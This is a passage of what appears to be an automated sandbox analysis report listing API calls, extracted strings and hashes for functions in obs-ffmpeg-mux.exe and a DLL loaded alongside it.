                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: GetLocaleInfoEx
                                                            • API String ID: 2299586839-2904428671
                                                            • Opcode ID: 6e732f5e732e50c2afe8612565c4dd4846509a9384a69e69c65b02c4743d18cd
                                                            • Instruction ID: f79b03962acf0a2d99dd2f9c21c10bf7c11847628c125f10e2b249636ebc32fb
                                                            • Opcode Fuzzy Hash: 6e732f5e732e50c2afe8612565c4dd4846509a9384a69e69c65b02c4743d18cd
                                                            • Instruction Fuzzy Hash: 9901A724B0974186EB058B66B4500AAA362EF8CBD0F544076DE5D27B57CE3ED541C784
                                                            APIs
                                                            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FFDA382FD9B,?,?,?,?,?,?,?,?,00000000,00007FFDA3837B38), ref: 00007FFDA382F99B
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2099609381-0
                                                            • Opcode ID: 007a0ee636362a66d880f0fa33426caab728f0c53ba04d0680f99ccb34fb51a1
                                                            • Instruction ID: 8dd26a99fd7ce16eef542abb38155ae2ab4fc050ebbc66a16e263cd16d37a703
                                                            • Opcode Fuzzy Hash: 007a0ee636362a66d880f0fa33426caab728f0c53ba04d0680f99ccb34fb51a1
                                                            • Instruction Fuzzy Hash: B4F08172B05A4583E700DB65F9A01A96362FB9D7C0F948075EA1DA3366DE3ED460C708
                                                            APIs
                                                              • Part of subcall function 00007FF71E742570: printf.MSPDB140-MSVCRT ref: 00007FF71E742587
                                                              • Part of subcall function 00007FF71E742530: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,00000000,00007FF71E742617,?,?,?,00007FF71E741BD6,?,?,?,00007FF71E741A02), ref: 00007FF71E742552
                                                            • puts.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF71E741BD6,?,?,?,00007FF71E741A02), ref: 00007FF71E7428DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: atoiprintfputs
                                                            • String ID: Invalid number of audio tracks$Invalid number of video tracks$Must have at least 1 audio track or 1 video track$audio codec$audio track count$file name$muxer settings$stream key$video bitrate$video chroma sample location$video codec$video codec tag$video color primaries$video color range$video color trc$video colorspace$video fps den$video fps num$video height$video max luminance$video track count$video width${stream_key}
                                                            • API String ID: 3402752964-4246942696
                                                            • Opcode ID: bbb72588bee9787a683502761444138c14bf0f1375247d53f9cdc5c5b4da8170
                                                            • Instruction ID: 477ff876ac398e144cb24eabe097cbaa7a025381f3e2a6817c44954c617c27f5
                                                            • Opcode Fuzzy Hash: bbb72588bee9787a683502761444138c14bf0f1375247d53f9cdc5c5b4da8170
                                                            • Instruction Fuzzy Hash: 49811875908A9691FA14FB91E6145F8A396AB0DFE0BC10072DD0D47A95AF3CF21ED320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: memmove$os_event_destroy$__acrt_iob_func__stdio_common_vfprintffclosefprintfmallocpthread_mutex_lock
                                                            • String ID: Error allocating memory for output$Error writing to '%s', %s
                                                            • API String ID: 161919314-4070097938
                                                            • Opcode ID: a31c7b85b8c0d82d0157cb35a6e72543ed071c06804e902690462ed57beb3fc0
                                                            • Instruction ID: 2cb51f32ce8ed0f497d9b8e006b31d22b812a8d7621eaf36defe1847152a88a3
                                                            • Opcode Fuzzy Hash: a31c7b85b8c0d82d0157cb35a6e72543ed071c06804e902690462ed57beb3fc0
                                                            • Instruction Fuzzy Hash: E4A13C32B19E8685E751AF21E4403F9A3A1FB8DBA8F844031DE8D17B59DF78E54D8720
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF71E741A6D
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74204A
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742065
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742080
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74209B
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E7420B6
                                                            • avformat_network_init.AVFORMAT-60 ref: 00007FF71E741A85
                                                            • av_guess_format.AVFORMAT-60 ref: 00007FF71E741AAF
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF71E741ABC
                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF71E741AD0
                                                            • avformat_alloc_output_context2.AVFORMAT-60 ref: 00007FF71E741AEC
                                                            • av_strerror.AVUTIL-58 ref: 00007FF71E741B19
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF71E741B23
                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF71E741B38
                                                              • Part of subcall function 00007FF71E742910: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E741B4C), ref: 00007FF71E742939
                                                              • Part of subcall function 00007FF71E742370: avcodec_free_context.AVCODEC-60 ref: 00007FF71E742388
                                                              • Part of subcall function 00007FF71E742370: av_free.AVUTIL-58 ref: 00007FF71E7423B1
                                                              • Part of subcall function 00007FF71E742370: avio_context_free.AVFORMAT-60 ref: 00007FF71E7423BD
                                                              • Part of subcall function 00007FF71E742370: avformat_free_context.AVFORMAT-60 ref: 00007FF71E7423CC
                                                              • Part of subcall function 00007FF71E742370: avcodec_free_context.AVCODEC-60 ref: 00007FF71E742402
                                                              • Part of subcall function 00007FF71E742370: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E742415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp$__acrt_iob_funcavcodec_free_contextfprintf$av_freeav_guess_formatav_strerroravformat_alloc_output_context2avformat_free_contextavformat_network_initavio_context_freecallocfree
                                                            • String ID: Couldn't find an appropriate muxer for '%s'$Couldn't initialize output context: %s$http$mpegts$video/M2PT
                                                            • API String ID: 3777911973-2524251934
                                                            • Opcode ID: 078559d49e555ef7517477361438487f95b7fa6d5945ffa6822e70d97715306d
                                                            • Instruction ID: 0d0daa45297ee84c1574ee18251f843f191e1a05f48263bfe6bbcccb9f16e50d
                                                            • Opcode Fuzzy Hash: 078559d49e555ef7517477361438487f95b7fa6d5945ffa6822e70d97715306d
                                                            • Instruction Fuzzy Hash: 3F31A231B18E8242FB20BB25F4112BAA391AF8DBB4FD05235ED5D47695EE2CF44C8720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Object$DeletePaintSelect$BeginCompatibleCreateImageLoadMessagePostProcQuitWindow
                                                            • String ID: $ymmvaxnnqpelgql.bmp
                                                            • API String ID: 2450474488-3406428242
                                                            • Opcode ID: f938f299d0a6a8bdbbcbd98ec490e40a93742d2f5315c66812953dffc706aadb
                                                            • Instruction ID: aec002bce7784bce1e38fe0ec50aaf5a682da20fe805b6a4033f02e56f28b736
                                                            • Opcode Fuzzy Hash: f938f299d0a6a8bdbbcbd98ec490e40a93742d2f5315c66812953dffc706aadb
                                                            • Instruction Fuzzy Hash: AA41FE3660DB82C6E7208F25F46436EB762FB88791F100175D68E52B69CF7ED488CB44
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_funcav_content_light_metadata_allocav_mastering_display_metadata_allocav_memdupav_stream_add_side_dataavcodec_alloc_context3avcodec_descriptor_get_by_name
                                                            • String ID: 2$Couldn't find codec '%s'$E
                                                            • API String ID: 3726879996-2734579634
                                                            • Opcode ID: 984bf621481a9a25f05ee9f8f0874bf5fd16c3df77fd558344dbfddc274f0f6a
                                                            • Instruction ID: 961ef1ecf28de4bdececd207ceb0ae2cee8b4b740aeeb2f90fb11d999697c06d
                                                            • Opcode Fuzzy Hash: 984bf621481a9a25f05ee9f8f0874bf5fd16c3df77fd558344dbfddc274f0f6a
                                                            • Instruction Fuzzy Hash: DF81F476608B848BD754DF25E54035DBBF0F789B98F50402AEB8C87B58DB7AE858CB00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_func$avcodec_descriptor_get_by_nameavcodec_find_encoder
                                                            • String ID: Couldn't find codec '%s'$Couldn't find codec descriptor '%s'$title
                                                            • API String ID: 3715327632-3279048111
                                                            • Opcode ID: c9720edbb9d548ebec2452977bce4eb4d803eed367fb80ba86fd3ea18017a218
                                                            • Instruction ID: 8af64f95d3f60c18776e200f0862d0fd04e60bfe77e803019aac43efab5a3b3b
                                                            • Opcode Fuzzy Hash: c9720edbb9d548ebec2452977bce4eb4d803eed367fb80ba86fd3ea18017a218
                                                            • Instruction Fuzzy Hash: 23618A72704B8486EB15EF16F5903A9B7A0FB88BA8F854035DE4E477A4DF38E069C710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: os_event_destroy$free$av_packet_freeav_write_trailerpthread_joinpthread_mutex_destroypthread_mutex_lockpthread_mutex_unlock
                                                            • String ID:
                                                            • API String ID: 2998719300-0
                                                            • Opcode ID: 8bdf6fd2e92e54ef71616242ce810bf52dd6c25259264d2bdbef31b8de60417c
                                                            • Instruction ID: 0b7ed1979f00911203039133b9ff4e34a6e7b6b118c5b9c469c6d5cf5cd38691
                                                            • Opcode Fuzzy Hash: 8bdf6fd2e92e54ef71616242ce810bf52dd6c25259264d2bdbef31b8de60417c
                                                            • Instruction Fuzzy Hash: AB31FF32A18E8291FB51FF35D4513F8A3A0FF99F58F884131DA4D4A196EF29A58D8360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ClassCreateRegisterWindow
                                                            • String ID: DrawingApp$nnwfzbyyokwcvrswbbm
                                                            • API String ID: 3469048531-3182045650
                                                            • Opcode ID: 67f015d44b4e2b0e2eda48759fa467bac14c15775e518013fdbca704f1913655
                                                            • Instruction ID: 2e7d3dab85f5fef5a00a307e1c3bf678a528ce0073ef030c217bd2c89da8cf00
                                                            • Opcode Fuzzy Hash: 67f015d44b4e2b0e2eda48759fa467bac14c15775e518013fdbca704f1913655
                                                            • Instruction Fuzzy Hash: 0D312B32609B8586E7608B20F86436EB7A5FB88385F500135D68E52B69DF7ED184CB44
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                            • String ID: bad locale name
                                                            • API String ID: 3904239083-1405518554
                                                            • Opcode ID: 315476c88add638def5cd1a661ea6bacc12a5953799f342fadb73ad74f07bb65
                                                            • Instruction ID: e812439fb147fd40987e218d02322edcf7e6a2f024a092603d1652e5526b2ac0
                                                            • Opcode Fuzzy Hash: 315476c88add638def5cd1a661ea6bacc12a5953799f342fadb73ad74f07bb65
                                                            • Instruction Fuzzy Hash: 66113052F6F74242DD44E72AF4A566E6352EFC2B81F406436FA8E23767CE2DD0518708
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74204A
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742065
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742080
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74209B
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E7420B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp
                                                            • String ID: http$rist$srt$tcp$udp
                                                            • API String ID: 1114863663-504309389
                                                            • Opcode ID: d2521f5543573ed7a9b47c763349208ce3ea302e6d5c14a99d4cb2250db2cd2e
                                                            • Instruction ID: b0dfe5586473410b06c11eb64756f5903fafa8f77c67c42125a03444a96a5175
                                                            • Opcode Fuzzy Hash: d2521f5543573ed7a9b47c763349208ce3ea302e6d5c14a99d4cb2250db2cd2e
                                                            • Instruction Fuzzy Hash: 9F01F7B0B14D0781FB226B66E440624A3A4AF4DFA5FC4503AC90D4BAA0DF2DF65EC730
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: os_event_destroy$memmovepthread_mutex_lockpthread_mutex_unlock
                                                            • String ID:
                                                            • API String ID: 4207702331-0
                                                            • Opcode ID: 2ecd02ec26d4cc9ba7addf2ffba6d2c38598a6939d4a4f97ceb40f02c73610ba
                                                            • Instruction ID: cef49c223136717e1d592017578f05debd0ea11ca310f2f266906a197902897d
                                                            • Opcode Fuzzy Hash: 2ecd02ec26d4cc9ba7addf2ffba6d2c38598a6939d4a4f97ceb40f02c73610ba
                                                            • Instruction Fuzzy Hash: B3417872618E8581E611EF15E4403BDA760FB99BE8F840031EF8D07B5ACF38E5A98720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
                                                            • String ID:
                                                            • API String ID: 1184979102-0
                                                            • Opcode ID: d1267e791b308d50114738cb6d3fcce0682459912f5f90b2ba963487117e6561
                                                            • Instruction ID: ed94904b330223c2bc4143b2a5a417f75b8fa78a40014c952d59b7b3a639dbed
                                                            • Opcode Fuzzy Hash: d1267e791b308d50114738cb6d3fcce0682459912f5f90b2ba963487117e6561
                                                            • Instruction Fuzzy Hash: 83314871A08E43A1FA14BB24E4513B9E291AF5D7A4FD44035EA4D4B6E7EE2CF80C8731
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            • Opcode ID: 7fdba593edf5c2be57765e2ee8e76f93c7495288ee8010476706ab2a19b5b13b
                                                            • Instruction ID: 1b3a6b1df8e095af549e37bc99333837fee0efc7383c988e79826bdd49c27991
                                                            • Opcode Fuzzy Hash: 7fdba593edf5c2be57765e2ee8e76f93c7495288ee8010476706ab2a19b5b13b
                                                            • Instruction Fuzzy Hash: 2CD19F32B09B8186EB209B75D4A13AD77A2FB45798F100175EE8D67B96CF3EE080C744
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FFDA38301BC,?,?,?,?,00007FFDA3826D5D,?,?,?,?,00007FFDA3816364), ref: 00007FFDA382FB44
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FFDA38301BC,?,?,?,?,00007FFDA3826D5D,?,?,?,?,00007FFDA3816364), ref: 00007FFDA382FB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: 3c623b4c913abd76a5853a759542e999bc4493d2e0e3f0ebf5aee22177e2fc78
                                                            • Instruction ID: f35791ab0cafd4b21140085aacab7129f7300b4fec504e168b7b37afffdcc065
                                                            • Opcode Fuzzy Hash: 3c623b4c913abd76a5853a759542e999bc4493d2e0e3f0ebf5aee22177e2fc78
                                                            • Instruction Fuzzy Hash: 3C415521B1B60281FA12CB7298301352393BF09B90F594536DD2E6B786EF3FE401C708
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$p$p
                                                            • API String ID: 3215553584-1995029353
                                                            • Opcode ID: ced69d13e143899f142fc6a402910ce540b67e7937260230ecd24125dfedc697
                                                            • Instruction ID: ae0c3d240eecdc1be616a17e49948f2162613e7d804d806a057628eb7af66f56
                                                            • Opcode Fuzzy Hash: ced69d13e143899f142fc6a402910ce540b67e7937260230ecd24125dfedc697
